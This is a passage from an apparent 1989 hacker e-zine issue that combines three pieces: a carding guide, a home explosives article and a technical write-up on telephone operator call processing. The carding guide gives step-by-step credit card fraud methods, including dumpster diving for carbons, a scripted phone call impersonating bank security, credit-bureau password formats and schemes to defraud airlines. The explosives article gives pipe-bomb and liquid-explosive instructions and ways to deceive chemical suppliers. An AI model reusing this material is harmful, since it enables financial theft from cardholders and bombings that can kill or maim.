place that is easy to buy from. THIRD- I suggest that you do not furnish your household with carded items. It is just not wise. Get a few things, if you like, and wait a little while. Sit tight. When things cool down, you might want to get some more things. REMEMBER- all things are good in proportion, but when you get out of that proportion (ie, get greedy and order a new house) you will most definately get caught sometime or another. Patience is the carder's best friend. (along, of course, with the VISA formula... hehe) FOURTH- You have all heard it before. DON'T DISPLAY YOUR SPEICAL TALENT AT SCHOOL, PARTIES, OR SOCIAL EVENTS. Not even to your best friends. ESPECIALLY not to your best friends. They are the ones most likely to brag about you and spread the word. This is the farthest thing from what you want. Keep it to yourself, and if you must tell someone about it, either call Phone Sex, a Bridge, or an Alaskan Operator. Those are your only choices, as no other carder or phreak wants to hear about how good you actually are. FIFTH- I wouldn't advise making a bussiness out of this, either. Sure, if you want to get a few dollars for things you order (and that you don't want anymore) sell it and keep the money. But its purely asinine to take "orders" from people for money. And even if you don't want money. Keep in mind that Credit Fraud IS a felony, and getting caught violating US Federal Laws is not a fun experience to go through. Do you want to go to jail for 10 years, and never again be able to get a good job because Joey down the street wanted to pay $10 for a new skateboard that retails for $75?? Thats what I thought. Your whole goal in life, as long as you participate in the Underground Arts, is to keep a low profile. VIII. Getting Credit Cards There are a number of ways through which you can get credit cards. FIRST- Go trashing. That is, go in back of a bank, department store (make sure it is not in a mall!), or other store which accepts credit cards. When the coast is clear, jump in their trash bin. Rummage around a bit. Having a look out might prove to be wise. What you are looking for are carbons - the carbon paper which the salesperson throws out after a purchase has been made. Remember these? It is the device that guarentees you (a legit customer) get a receipt of your credit card purchase, and also that the store gets a copy for record keeping. Once you find these, (and making sure you don't rip them) put them in a bag, pocket, whatever, and get somewhere safe. (home?) Hold them up to the light, and copy down everything you think is important. Card Number, expiration date, name, address, bank name, etc... Then BURN the carbons. This destroys all evidence that you ever had them. From here, you are set. Order away! SECOND- If you have a friend that works in a store which performs credit card transactions, you might save yourself the trouble of banana peals on your head and ask him/her if they might not mind slipping the carbons into a bag after they ring up a sale. (or have them copy everything down for you.) THIRD- You might try bullshitting people and getting their cards. You have to be VERY good, and the person has to be VERY stupid for this to work. In my mind, it is a waste of time, and almost never works. (Because people where I live are smart, of course..) I am presenting this to you in case you live in a society of morons. Exploit every area that you possibly can. The conversation might go something like this: YOU: "Hello, Mrs. Davis? This is Mr. Off from Security down at Citibank. We have had a computer breakdown and no more of your VISA transactions can be processed since we lost your credit card number. Do you think that you can give me your number again, so I can re-enter it right now?" Mrs. Davis: "Wait a minute, who is this again?" YOU: "My name is Jack Off and I am from Citibank Security. (Explain whole situation to her again )" Mrs. Davis: "I don't know about this. Can I call you back at a number?" YOU: "Sure. That's no problem. I understand your reluctance. Here... call me at my office. Its 555-1212 (pay phone, loop, or bridge which you are at)" Mrs. Davis: "Ok, bye!" YOU: "Hello? This is Jack Off's office, Citibank Security, may I help you?" Mrs. Davis: "Oh, good. I was afraid you were a phony. Ok, my VISA is xxxx- xxx-xxx-xxx... " YOU: "Thank you. We will try to restore your credit limit as soon as possible. Until then, please refrain from trying to purchase merchandise on your Citibank Visa Card. Goodbye." Neat, huh? FOURTH- If are a really advanced Carder, you can get fancy and use a credit card formula. Great, you're saying to yourself. GIMME GIMME GIMME! Not so quick. Although several do exist, and I do have a couple of them, I am in a situation in which I am unable to reveal it. If you are particularly smart and intelligent, you can develope it yourself. Actually, it is not that hard if you have the means. MAYBE if you are good at math.... FIFTH- You may try to get credit cards from other people. (friends?) I stronly recommend against this. Usually the cards you get from other people have usually already been used and are either being watched or are already dead. SIXTH- If you have access to a Credit Union, you can call and "pull" someone else's account. (For instance, if you know someone's name and address, or social security, you can take a look at all of their loans and credit cards. ) IX. Advanced "Carding" Techniques Please, people, I beg of you -- If you have not been carding for a year or two (AT LEAST) do not read this information. It will only confuse you, and even if you understand it, it will not work as it should unless you have the experience you are lacking. So sit tight and practice with parts I-VIII. PLEASE! If, perchance, you happen to have the experience necessary to read on, then enjoy this. The following are simply a few details, hints, etc, that I just left out of the original manuscript due to my horrendous memory. Add to it if you like, and pass it a long. We all need to help each other if we are going to survive. Also, the following are in no particular order except that which they come to my head. 1) For a drop site, you can try to get fancy if need be. I have heard of empty military huts being used as well as empty condos, empty houses whose owners are on vacation, and about a zillion other stories. If you think you have come across something new, think a plan up, think it over, and think it over again. Make sure you have every step down so when you order, pick up, and make your escape, there are no problems. Think about it . . . what harm does it do to spend an hour making sure you didn't overlook something. It is a lot better than going there and getting caught. 2) Sometimes the places you order from will have an online account with a credit record bereau. (Such as TRW, CBI or Transunion) The horrifying fact is that they can verify ONLINE ANY information that you give them. So, you're busted, right? Wrong . . . If this happens, there is nothing you can do unless you have a lot of power with phones. Chances are, you don't. So play it cool and give an excuse to get off the phone. Just try somewhere else. Also, if you don't do this right, you will probably kill the credit card. X. Credit Unions Credit Unions basically are databases that hold information of its members. When you apply for a credit card, I think that the application to be a member of a Credit Union is presented also. Since almost EVERY person who owns a credit card has personal information in at least one of these services, then there is no fooling he who has access to these services. Many times in your carding career, you will run into a bussiness who has an online connection to such unions. If you try to present false information they will catch you and follow up with the appropriate actions. (That is, report the credit card you said is yours as dead, call the authorities, etc, etc.) Two of the major Credit Bureaus in the United States are TRW and CBI. As these two services hold large bases of information on its members (ie, every credit card holder in America), many unauthorized personnel often wish to gain access to them. They are accessed through a computer by calling a Bureau port and entering authorization passwords. For CBI, the passwords are in the format of nnnllnnn-**, where n=a number 0-9; where l=a letter from a-z; and where *=any character. For TRW, the passwords are in the form of lllnnnnnnnlnl. (using the same key as CBI.) As you can see from the length and complexity of these passwords, it is literally impossible to hack them. (ie, hack in the sense guess them.) So you are probably wondering how unauthorized persons gain access, huh? Well, we either have inside information or we go trashing. Thats it. Right now, however, I am not going to go any further into the subject of credit unions. Be aware that they exist, and they can help you as well as hurt you if you don't know what you are doing. At a later date I plan on devoting an entire file to the subject of credit unions, as I haven't seen an up-to-date file in years. Thats about all. I wish you all good luck, and may your adventures be safe and fun-filled. And if I EVER catch any of you giving out the credit formula (once you discover it..) I am going to personally fly over and kick your ass. (remember- I have carded tickets around the country many times. There is nothing to stop me from visiting YOUR town.. hahaha) One final note -- VISA is planning on changing their credit formula within a few years. So if you happen to be reading this many a year down the line, you will most likely discover that some of this is no longer valid. DONT BLAME ME. It was valid at the time when I compiled it. APPENDIX A ---------- Credit Card Formats ------------------- American Express -- xxxx xxxxxx xxxxx X/ X/ X/ / | X / | X 4 digits 6 digits 5 digits VISA -- xxxx xxxx xxxx xxxx X_________________/ 4 digits each group OR -- xxxx xxx xxx xxx X/ X_________/ / 3 digits each 4 digits Mastercard -- xxxx xxxx xxxx xxxx X_________________/ 4 digits each group Discover -- xxxx xxxx xxxx xxxx X_________________/ 4 digits each group. APPENDIX B ---------- Credit Verifiers 1800-554-2265. Use '#' (pound) as control key. Card Type: 10 = Mastercard 20 = Visa Bank Identification: 1067 Merchant Number(s): 1411 52 IDEA:: You all know those sex lines (like 800-666-LUST), well they verify your credit card before they let you listen. You might try calling one of these and using it for a while if you have nothing else. APPENDIX C ---------- Other Things to Do 1] Plane Tickets It is relatively easy to order plane tickets using a credit card nowadays. And, for convenience, you can order over the phone. Well, look up your favorite airline, call them, and present them with the situation. You would like 2 executive class tickets to Florida [ Ed. Note - If you live in Florida, make it a trip to California ] round trip to be billed to your Visa Credit Card. Oh sure, maam. My credit card number is . My expiration date is . My Name is Joe Schmoe. I live at 223 Hard On Lane, Pubic Hair, PA. Oh, and maam, could you PLEEAZE hold the tickets at the airport for me. I will present some identification to pick them up there. Thank you. It is relatively easy to do this. But, there are a few catches. A.) Do NOT stay for any long period of time at any one place. After few days, the airline will catch on to what you have done. My suggestion is that you stay for only about 2 to 3 days. Or, if you really want to stay for a long time, get a one way ticket to wherever it is that you would like to go to. Stay however long you want to stay and take another 1 way ticket home. B.) If you plan on traveling around the country, catch one way tickets around from place to place. And please, USE DIFFERENT AIRLINES! 2] Motorcycles Again, you would be surprised at the amount of work (or lack of it) required to aquire motorcycles on other people's credit cards. I believe you can all see the advantages, so let us get down to the procedure. First, set up an order under a corporate account. You can find these sometimes if you work in a store that would use such cards. (Look over shoulders) Well, I will leave to you the methods to come upon corporate account cards. Once you have them, finish the procedure. Step 2 is to send an "employee" (yourself or a stupid friend) to pick it up. Bring proper identification that was issued from the corporation. (I suggest making your own -- Not very hard). Offer a Voice Mail Box as your bussiness number. It is very common for a high level employee to be absent from his desk. Use your imagination for the rest, and tidy it up to perfect it. 3] Travelers Cheques OKAY, I will admit this is getting out of hand, but what the hell -- For those of you very daring and in possession of a very good form of false identification (Birth Certificate?), you can easily order some American Express Traveler's Cheques for your travels around the world. The number to call is 1-800-777-7337. Using your American Express Credit Card, order some of these "babies" in another name. (For a gift..) Have them delivered as you deem appropriate. Enjoy them thouroughly. [ Ed. Note: This number is active as of 12-20-88. I don't know if these offer this service year round. Find out! ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= P/HUN Issue #4, Volume 2: Phile 5 of 11 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD Introduction to Home Explosive Manufacture Written by: Franz Liszt I do not assume any responsibility in how this information is used; legally or illegally and I do not recommend that one manufacture explosives without a B.A.T.F. licence. Do not worry about possessing this information because the F.O.I.A. allows you to have any information such as this, so as long as it is not classified data. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- INTRODUCTION I know of all of you phreaks, hackers, etc. out there are interested in any kind of information that the public usually does not publicize. This is why I have wrote this phile - to inform you. I also feel that I should volunteer this information to PHUN because I have obtained much useful information from that publication and others. I think that anyone with good knowledge should teach it to their phriends because we are becoming a dumb race due to the enlightened attitude of the population from influences such as yuppies, geeks, skateboard freaks, subliminal brainwashing, bloated bureaucrats, and lazy legislatures. We must try to become free THINKING people so our brains do not atrophy. Don't let any of the above influences brainwash you into a quivering pathetic mass of gelatin like so many people are now. Use any information from philes you read to benefit you and rid of the bastards out to get you!!! At any rate, lets get on with it...The field of explosives is a very interesting one to study. It can be fun, and it can be dangerous at the same time. One must exercise great caution when assembling any type of explosive device since most are sensitive to jarring, rough handling, friction, static, and other influences. THIS INCLUDES MIXING ANY CHEMICALS OR EXPLOSIVES TOGETHER. DO NOT EVER MIX ANY EXPLOSIVE FORMULA TOGETHER WITH ANOTHER UNLESS YOU WANT YOUR BODY EVAPORATED OR AT THE LEAST, LIMBS REMOVED OR EYES BLINDED. If you are uncertain of an explosive formula you have found in an anarchist book or on some BBS, don't make it. As a matter of fact, don't trust to many philes you see and only believe the reputable books such as "The Poor Man's James Bond I & II", the "CIA Black Books", and army field manuals. I also ran across some new books called "Kitchen Improvised Explosives", which can be had from a radical book company called LOOMPANICS UNLIMITED P.O. Box 1197, Port Townsend, WA 98368. They are also a very good source for information but the procedures outlined require more lab apparatus. It is also a good idea to take some chemistry classes. Take advantage of chemistry in high school if you are still there. You can learn a lot if you pay attention and read ahead of your teacher. Try to get on his good side so he will let you perform "extracurricular activities" in the school lab. You can learn a lot by doing experiments and you can also have access to chemicals and expensive lab ware which I find is necessary to safely make many explosive compounds. If you are out of school, and you want to get serious about explosives, take a chemistry class or two at your local college. Call your local Technical school if you have one and ask them if they are offering any miners blasting seminars in the future (yes these do exist). If not, call your local bureau of mines and inquire. Some "social engineering" may be necessary when talking to them though. One should at least go to the local library and look for explosive books and check the encyclopedias for "scratch the surface" information. If you know a little about chemistry, get the book "The Chemistry of Powder and Explosives" by Tenny L. Davis. You can obtain journal footnotes from such books and do further research in "Chemical Abstracts" and "The Journal of the American Chemical Society" along with many others; all obtainable from a halfway decent college library in the reference section. __________________________________________ EXPLOSIVE TYPES Basically, there are two types - low and high. The low explosives are chemical compounds such as black powder, flash powder, match head powder, etc. These compounds do not necessarily explode but have more of a burning characteristic. They will propagate into an explosion when confined in a solid container such as a "pipe-bomb" so the gases they produce can expand forcefully instead of burning away in the open air. Black powder for instance detonates at about 300 meters per second, which roughly means if you make a "train" or line of it 300 meters long, and detonate it with a blasting cap at one end of the train, the chain reaction and decomposition of the whole train will take one second. And black powder releases about 12000 PSI when confined in nominal 2" water pipe with a wall thickness of 1/8" and detonated with a No. 8 blasting cap (this is a standard size blasting cap that coal miners and the military uses). Notice I said that it must be detonated. You cannot just stick a wick in the pipe and light it because more that likely it will only burn and make a big fire. I will talk more about detonation later. 2,4,6-Trinitrotoluene (TNT) detonates at about 7400 meters per second when cast loaded into a container. TNT is a high explosive and its subsequential confinement in a container is not as important as with low explosives. High explosives are chemical compounds that will explode regardless of containment. You could lay a big pile of TNT on the ground, lay a blasting cap on top of it, light the wick, and the whole mess will still explode. High explosives undergo a chemical reaction of decomposition in less that a millionth of a second. All of the energy is released instantaneously. Low explosives, such as black powder have more of a burning characteristic. High explosives not only detonate much quicker, but also release more energy. TNT releases about 4.24 million PSI and the military explosive C-4 releases about 5.7 million PSI and detonates at 8100 meters per second! _____________________________________________ DETONATION Most high explosives are not capable of detonating without being set off or initiated with another explosion. This is done with the help of those neat little goodies called blasting caps. They contain medium to high explosives also, but their chemical composition(s) are unstable and will detonate when fire or spark is introduced to them. You may ask then why not just use blasting cap explosive instead of regular high explosives. Well, blasting cap materials are VERY sensitive to shock, friction, etc. and are also not as efficient as regular high explosives. Anyway, the blasting cap is usually placed in the high explosive in a well dug in the high explosive. An example would be like this in a pipe bomb: _______ Blasting cap / !-- * --! ! * ! ! * ! ! !_____ Pipe bomb ! ! ! ! ! ! ! ! !-------! (please excuse the ASCII drawing) When the cap is detonated, the explosive wave it generates is directed downward and detonates the high explosive in a "chain reaction". This is why the bottom of the explosive container should be placed on the target. The peak of the propagated explosive wave will be at the bottom of the explosive charge... At any rate, I do not suggest that one attempts to manufacture blasting caps without knowledge in explosive handling safety and also the proper laboratory procedures when making the blasting cap explosive itself. I have made over 300 blasting caps without an accident. I also take very careful precautions before assembling the caps and I have a properly equipped laboratory to synthesize the explosive material. I always work in a controlled environment with accurate measuring equipment for any explosive experiment I partake in. It is necessary to work under a lab fume hood to vent any toxic gases produced during experiments. It is also a good idea to ground yourself and your work area so static electricity doesn't wreak havoc and blow your chemical up in your face. IT IS GOSPEL TO FOLLOW DIRECTIONS WHEN DOING ANY EXPERIMENT. ESPECIALLY WITH EXPLOSIVES. Outline your explosive production procedure before proceeding with any experiment. Refer to literature at your local library concerning blasting cap mfg. before you attempt to make them. The book I mentioned "The Chemistry of Powder and Explosives" covers the subject very well. There are also some good books available from Paladin Press on explosive manufacture and the blasting cap manufacture. It is possible to create blasting caps in a "kitchen" type environment, but I do not recommend it because of the dangers involved when making the explosive components. Many of the starting materials are corrosive and toxic. Blasting cap explosives are also VERY sensitive. More so than nitroglycerine in some cases. For instance, Lead azide, the most popular blasting cap explosive today, when synthesized improperly, can grow into crystals in the starting agent solution and spontaneously explode just because of improper stirring and/or cooling. Very easy mistake to do. Mercury fulminate, one of the cheapest and easiest to synthesize, produces toxic gases when synthesizing. When the finished product is dry, it is sensitive to a 2cm drop of a 5 lb. weight. THAT IS SENSITIVE! ALTERNATIVE: After all of this negative talk of blasting caps leaves much to be desired. But there is an alternative to using blasting caps if one has access to firecrackers such as M-80's, M-100's, M-200's, cherry bombs, Maroons, etc. These little bombs themselves are sufficient enough to detonate many high explosives. All of the "nitro" compounds will detonate with one of these firecrackers. Their use would be the same as the blasting cap - inserted in a little "well" made in the explosive charge, sealing off, and their fuse ignited accordingly. ____________________________________________ MAIN EXPLOSIVE CHARGE This is the big working explosive. The one that does the big damage. It should be handled with the same precautions as blasting caps, but in many cases, can be as safe as handling fertilizer. Some examples of common high explosives are ditching dynamite, gelatin dynamite, ANFO (ammonium nitrate fertilizer/fuel oil), TNT, PETN, RDX, military plastics, and even smokeless powder. These explosives are easily made in some cases, and dangerous at the same time. Since it is beyond the scope of this article, I must refer everybody to your local library, the books I have mentioned, or most of the "unusual" book publishers. Just do research in all possible material before grabbing a book and running out, buying the chemicals, and throwing stuff together. Get yourself a few of the "black-books", the "Poor Man's James Bond volumes", etc. and compare them with each other. Don't trust any unheard of publishers or books. It goes the same for the main charge; if one doesn't have access to the necessary chemicals, one can improvise. For instance the smokeless powders available from gunsmith's and reloading shops contain high- explosives such as nitrocellulose and nitroglycerine. They are called double based propellants. An example is made by Hercules Powder co. called "Bullseye" pistol propellant. It contains: 48% Nitroglycerine 50% Nitrocellulose 2% Flash suppressants, stabilizers, etc. It will detonate at about 7200 meters/sec. when firmly packed in 2 inch wide, schedule 40 hardened steel pipe. It detonates with 2,000,000 PSI also. This should suffice for many operations. I myself placed 1 1/2 pounds of the powder in a three pound coffee can and detonated it with an M-80 firecracker and it left a ditch in hard packed clay-soil about 2 feet deep and 3 feet wide! It was simply placed on the ground with the bottom of the can down. The blast was plainly heard indoors 1 mile away! Please if you attempt such a blast, make sure you give yourself ample time to get at least 300 yards away and don't detonate it near any buildings within 50-75 yards because the air-blast will possibly crack their windows. I usually use a lit cigarette placed on the fuse of the cap or firecracker. This will give you about 10 min. delay depending on the temperature and wind conditions. Packing the cigarette will give a longer delay. Another good explosive, if you prefer a liquid explosive is a mixture of Nitromethane and amine based compounds such as aniline, ethylenediamine, and for anyone that can't obtain the above chemicals, regular household ammonia will work as long as it is the clear non-detergent brand. The Nitromethane can be had from any "speed-shop" or race car parts supplier. It usually runs about $20 to $30 bucks a gallon. Simply mix the two liquids: 96% nitromethane and 4% ammonia (by weight). This explosive has the disadvantage of being somewhat insensitive. You need at least a No. 8 blasting cap to detonate it. It only need be confined in any kind of capped bottle and the blasting cap inserted in the neck. The blasting cap should be dipped in wax before immersion in the liquid explosive. Some Nitromethane manufactures add a indicator dye that turns purple when the liquid becomes dangerously explosive. So, when you mix your ammonia with the Nitromethane and the solution turns purple, you know that you have done well! ________________________________________ OBTAINING CHEMICALS AND LAB WARE Getting your chemicals and lab ware can present a problem in some cases. In order to order laboratory chemicals, one must be a company, or try to prove that you are a company. Most suppliers don't like to sell to individuals in fear of clandestine drug and explosive manufacture. Those same companies also can be fooled easily with homemade letterhead also. For those of you with laser printers, the sky is the limit. If you don't have a laser printer, you should visit your local print shop. First, simply call the chemical companies and request for a catalog. You must get on the phone and say something on the order of: "Hello...this is C.B.G. Water Treatment Corp., may I speak to sales please? I would like to order your most recent catalog..." When you get catalogs from different companies, compare their prices and shipping charges. Make sure you don't order a set of chemicals where it is obvious you are making something you don't want them to know you are making. A suspicious order would be Nitric & Sulfuric acid and glycerine. This would be obvious that you are going to produce nitro- glycerine. Spread out your orders and orders between companies. Also be careful of watched chemicals. The drug enforcement agency watches certain orders for certain chemicals. They usually say something on the order of under the listing of the chemical entry in the catalog "only sold to established institutions." It just so happens that certain explosive synthesis requires the chemicals as some illicit drug production. Go to your local library in the reference section. Get the THOMAS REGISTER It is a set of books that list addresses of industrial suppliers. Look under chemicals for addresses. I do know of one company called Emerald City Chemical in Washington. They only require that you be at least 18 years of age. No letterhead necessary. I suggest staying away from Fisher Scientific, Seargent Welch, Sigma & Aldrich Chemical companies because they are either expensive, only sell to schools, or watch for illegal or suspicious chemical orders. I noticed that a lot of you phreaks out there live in New York; so stay away from City Chemical Co. I was informed that they closely watch their customers also. Don't make some letterhead for Jo Blow's Sewing Machine Repair and order complicated chemicals like 2,3,7,8-tetrachlorodibenzo-p-dioxin, bis-2- ethylhexy-diadipate, 3,4-diaminofurazain, or pharmecitucal type chemicals or any kind of chemical that looks like a foreign language. It looks VERY suspicious and your address will be forwarded to your local FBI or DEA office pronto. Nowadays you really got to watch what you order thanks to our bleeding heart liberals worrying about kids blowing their hands off trying to make firecrackers, or folks making controlled drugs in their basements. ________________________________________ CONCLUSION I hope this information is of some use to you. Just remember that it is a federal offense to manufacture and transport explosives or explosive devices without a B.A.T.F. licence. Also keep in mind that if you do decide to make yourself some bombs, just remember NOT TO TELL ANYONE! If you tell someone, that is just the added risk of getting caught because your "buddie" was a stool pigeon. BELIEVE ME - chances are if you tell someone, others will find out from gossip and you will be the alias "mad bomber" of your town. If someone happens to see any lab equipment or if your neighbors smell any strange chemical smells around your home, they might even think you are making drugs, so be careful. If you tell your friends of your activities, don't be surprised if you see a gunmetal grey Dodge Diplomat with a dozen antennas protruding from it sitting across the street with a guy in it watching your house with a spotting scope... DO NOT SELL explosives to ANYONE without a licence. If they get caught, the feds will plea-bargan with them and find out where they got the bombs and of course your buddie will tell them so he gets a reduced sentence. They WILL get a search warrant with no problem and proceed to ransack your premises. I know of a person that was in a similar situation. He didn't have any explosives in his house, but they seized his chemicals because of the complaint filed. Subsequently, the feds kept up pretty good surveillance on him for quite a while. Use this information with caution and don't blow yourself up! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Feb. 20, 1989 Brought to you by Franz Liszt, and The Manipulators... =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NOTICE: THIS FILE MAY ALSO BE RELEASED IN A 'YET TO COME' NEWSLETTER. ************************************************************************* * * P/HUN Issue #4, Volume 2: Phile 6 of 11 * * * * DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD * * * * * * * * Traffic Service Position System(TSPS) No. 1B * * * * * * * * Call Processing and Explanation * * * * Part One * * * * * * * ********************************************************************* * * ********************************************************************* * * * * * * * - Coin Stations and ACTS * * * * - Calling Card Service * * * * and * * * * - Billed Number Screening * * * * - Busy Line Verification * * * * * * * ********************************************************************* * * ********************************************************************* * * * * * * * Written By. . . Phelix the Hack * * * * * * * ********************************************************************* * * ********************************************************************* * * * * * * * The author hereby grants permission to reproduce, redistribute * * * * or include this file in your g-file section, electronic or print * * * * newsletter, or any other form of transmission of your choice, * * * * pending the fact that it is kept intact and in its entirety, * * * * with no additions, alterations or deletions of any of the info * * * * included below. * * * * * * * * Phelix the Hack Feb. 1989 * * * * * * * ********************************************************************* * ************************************************************************* 1.0 Introduction ================ The purpose of this file is discuss and describe the general system architecture and processing of certain calls handled in a Traffic Service Position System (TSPS) No. 1B office. From here after, any reference to the anacronym - TSPS, will be used to describe the Traffic Service Position System 1B. Wheras TSPS processes a wide variety of call types (listed below), this file will deal primarily with only a few types which I feel to be of special interest and importance to the phreak/hack community. Future files on TSPS will continue to expand upon the information presented here, and will discuss additional call types and processing. The types of calls, elected to be discussed in this file will fall primarily within the three following categories: 1) Coin Station Calls (Payphone) and ACTS call processing. 2) Calling Card Service and Billed Number Screening. 3) Busy Line Verification 2.0 Table of Contents ====================== Section Description ======= =========== 3 Anacronyms and Abbreviations used throughout this file. 4 General overview of call types. 5 General call processing for Coin and CC Services. 6 Coin Station. 7 Calling Card Service. 8 Busy Line Verification 9 Conclusion : Acknowledgements and References. 3.0 Anacronyms and Abbreviations ================================= The following is a list of anacronyms and abbreviations commonly used throughout this file. Due to the large number of times each appears, from this point on the abbreviations will be used the majority of the time. - TSPS - Traffic Service Position System - ANI - Automatic Number Identification - ANIF - ANI Failure - ONI - Operator Number Identification - H/M - Hotel/Motel - DLS - Dial Line Service - ACTS - Automated Coin Toll Service - CCS - Calling Card Service - BNS - Billed Number Screening - OST - Originating Station Treatment - SOST - Special Operator Service Treatment - OPCR - Operator Actions Program - RQS - Rate Quote System - PTS - Position and Trunk Scanner - RTA - Remote Trunk Arrangement - DDD - Direct Distance Dialed - AMA - Automatic Message Accounting - CAMA - Centralized Message Accounting - RBOC - Regional Bell Operating Company - MF - Multi-Frequency - DTMF - Dual Tone Multi-Frequency - CDA - Coin Detection and Announcement - SSAS - Station Signaling and Announcement Subsystem - SPC - Stored Program Control - T&C - Time and Charge - PIN - Personal Identification Number - RAO - Revenue Accounting Office - NPA - Numbering Plan Area - CCIS - Common Channel Interoffice Signaling - APF - All PINs Fail - OTC - Operating Telephone Company - ICVT - InComing Verification Trunk - OGVT - OutGoing Verification Trunk - INTT - Incoming No Test Trunks 4.0 General Overview of Call Types ================================== All call processing can be broadly thought of as the processing of a service request (by an operator or a customer) thru connection, talking state, and disconnection. Call types can be classified into the following two major groups: (Although no definite line can be drawn, in that the groups often overlap each other.) 4.1 Customer Originated Calls ============================== The first category of calls are those which can be classified as customer originated. In an effort to keep with the three main types discussed here, some of the call types listed will not be explained. 4.1.1) 1+ Calls =============== - DDD calls - Calls with ANIF or ONI - H/M calls - CAMA calls - 900 Dial Line Service (DLS)..."Dial a Vote" - NonCoin transfers from offices with out billing equipment - Coin Calls...Discussed later in greater detail 4.1.2) 0+ Calls ================ - Calling Card Service (CCS) Calls - Billed Number Screening (BNS) Calls - Originating Station Treatment (OST)..Third Party Billing, Collect.. 4.1.3) 0- Calls ================ - OPCR ...Standard RBOC(or Equivalent) "0" operator 4.1.4) International Call Handling (ICH) ...Overseas Calls =========================================================== 4.1.5) Automated Quotation Service and H/M calls ================================================= 4.2 Operator Originated ======================== The second category of calls handled by TSPS are operator originated, and are normally only initiated after a response to a customers request. These calls are of a nature that require operator intervention in order to complete. Examples: BLV/EMG INT, collect, third party billing... 4.2.1) Special Operator Service Traffic (SOST) =============================================== - These include calls which must be transferred to a SOST switchboard before they can be processed. Examples: Conferences, Appointment, Mobile... 4.2.2) Delayed Calls ===================== 4.2.3) Operator Service Calls ============================== - Customer/ Operator requested Rate and Route information ( RQS ) 4.2.4) CAMA Transfer Calls =========================== - Includes ANIF and ONI - Transfers from areas without billing equipment 4.2.5) Busy Line Verification (BLV) ==================================== - The Busy Line Verification allows a TSPS operator to process a customers request for a confirmation of a repeatedly busy line. This service is used in conjunction with Emergency Interrupts and will be discussed later in more detail. 4.2.6) Inward Calls ==================== - An inward call requires a TSPS operator to provide services which the customers originating operator is not able to provide. Ex: connection to a hard to reach number, BLV/EMG INT, CCS billing validation...An inward call can be originated with any of the following arrival codes: - 121 : NonCoin code...standard inward connection - 1150 : Coin code - 1155 : Noncoin with T&C code - 1160 : TSPS operator assisted inward CCS validation - 1161 : Automated inward CCS validation for non TSPS operator with DTMF touch tone signaling. - 1162 : Automated inward CCS validation for non TSPS operator with MF signaling. - Examples of the above codes: - KP+NPA+121+ST gets inward operator in NPA selected with only INWD key illuminated, indicating call connected to position in an inward call. - KP+1161+ST gets automated CCS validation that responds to DTMF tones. 5.0 General Call Processing for Coin Stations and CCS ====================================================== This section will deal with the processing that occurs during all customer initiated calls, and can be applied to both Coin and CCS calls. The following processes are presented in the order which they would normally be handled. 5.1) Trunk Seizure =================== - When a local office seizes a trunk in response to a customer request (i.e.- A customer has picked up the phone, placing it off-hook), current flows thru the circuit, changing the state of the ferrods (i.e.- scan points ) from an on-hook to an off-hook position. When this change is determined by the PTS (Position and Trunk Scanner) at the RTA (Remote Trunk Arrangement) to be an actual off-hook transition, and not merely a flash (tapped switch hook), it is taken as a request for service. 5.2) Digit Reception ===================== - After a trunk is seized the local office sends the called and calling number to the TSPS by means of MF pulsing. A Base Remote Trunk is connect to the MF receiver, which then proceeds to outpulse the MF digits. The digits are received and registered on ferrods by the PTA in the order in which they were received. The called number is the number dialed by the customer and consists of either 7 or 10 digits; the calling number is determined by the local office ANI equipment or by ONI, in case of ANIF. 5.3) Bridging a Position ========================= - An idle occupied position is then bridged onto the call by a connection to the TSPS. If operator service is required after connection to a position, the operator is prompted by a "zip" tone, and is alerted by a KIND OF CALL lamp, which provides information as to whether the call is coin, noncoin, 0+, 0-...If no operator service is required, the MF digits are outpulsed along the appropriate routing. 5.4) Call Connection ===================== - If operator action was needed, upon the operators disconnect of the line (position released), the network connection between the the TSPS trunk and the base remote trunk is severed. The established through connection is now placed in a call floating (talking) state until disconnect. 5.5) Call Disconnection ======================== - Both ends of a connected call are monitored for an off-hook state change, which upon indication,must occur long enough to be recognized as an actual disconnect (and not merely a flash...). Another manner of disconnect is from a called party Time Released Disconnect (TRD), which is employed to limit billed party liability and release network connections. Example: A customer requests a disconnect after x number of minutes, or after $x.xx. The final action in a disconnect is to return the TSPS trunk to an idle position, which then awaits recognition of another service request. 5.6) AMA Data Accumulation and Reception ========================================= registered, and prepared for billing. The following is just some of the information that is recorded on disk for processing. - Call Connect - Elapsed time - Signaling Irregularities - WalkAway Toggle (coin station fraud...discussed later) - Type of number billed 6.0 Coin Station Calls and ACTS Processing ========================================== In general, coin station calls can be divided into 1+, 0+ and 0- originated calls, not including 0+ and 0- CCS calls which will be discussed later in this file. All calls falling into these categories go through the following basic operations, many of which were described in section 5 of this file. (The [] indicate operations that may or may not be present, depending on the type of call placed) - 1) Trunk Seizure - 2) Digit Reception - 3) Bridging a Position [and Coin Detection and Announcement (CDA)] - 4) [Operation Action and] Digit Outpulsing. - 5) Talking Connection - 6) Call Disconnect - 7) AMA Processing 6.1 Automated Call Processing ============================== All coin station calls requiring coin input from the customer are handled by the Automated Toll Services (ACTS) which is implemented by the Station Signaling and Announcement Subsystem (SSAS). The SSAS automates the initial contact on most 1+ (station paid) toll calls, by transmitting an announcement requesting the initial deposit from the customer, and counting the deposits. If an unusual delay occurs during the coin deposit period, the SSAS will prompt the user for the remaining deposit needed to complete the call. Upon completion of sufficient deposit, SSAS provides an acknowledgement announcement thanking the customer, and then causes the outpulsing of the called digits to be handled by the Stored Program Control (SPC). This delay in outpulsing prevents free, short duration messages and keeps the audible ring of the called party from interfering with coin detection signals. Any customer over-deposit is automatically credited towards overtime charges. SSAS can accommodate initial periods of up to 6 minutes, at the end of which the local office rate schedule is accessed and announcement may or may not notify the customer of the end of initial period. 6.2 Operator Intervention =========================== If at any time during the coin collection period, a customer fails to deposit the sufficient funds (within a specified time period), or a flash is registered on the switchhook, a TSPS operator will be bridged onto the call. In this event SSAS will monitor the coin deposits via a type I CDA circuit; however all automated coin announcements will be suppressed. All calls originating from postpay coin stations must initially be handled by an operator, in 